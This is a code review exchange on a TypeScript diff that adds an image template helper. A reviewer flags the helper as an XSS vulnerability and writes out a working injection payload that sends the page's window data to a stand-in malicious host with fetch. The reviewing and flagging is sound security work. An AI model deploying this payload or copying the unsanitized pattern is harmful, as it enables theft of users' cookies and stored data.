src/ui/Templates/CoreHelpers.ts

```diff
@@ -664,7 +664,14 @@ TemplateHelpers.registerFieldHelper('anchor', (href: string, options?: IAnchorUt
   return AnchorUtils.buildAnchor(href, options);
 });
 
-TemplateHelpers.registerFieldHelper('image', (src: string, options?: IImageUtilsOptions) => {
+TemplateHelpers.registerFieldHelper('image', (src: string, options?: IImageUtilsOptions, result: IQueryResult = resolveQueryResult()) => {
+  if (options && options.srcTemplate) {
+    return ImageUtils.buildImage(StringUtils.buildStringTemplateFromResult(options.srcTemplate, result), {
+      alt: options.alt,
+      height: options.height,
+      width: options.width
+    });
```

Comment:
Since buildStringTemplateFromResult isn't sanitized, this is a XSS vulnerability.

For instance: If users on a given client's website are allowed to choose a custom image URL, they could inject the following to steal cookies, localStorage, etc from every other user viewing the page: `'/><script>fetch('https://somemaliciouswebsite.com/datacollector', { body: JSON.stringify(window) }).then(()=>{})</script><img src='https://someimagehost.com/innocentimage.jpg`

Reply:
typically, this value is set by an administrator, not by the end-user, but it would probably be more prudent to add XSS validation.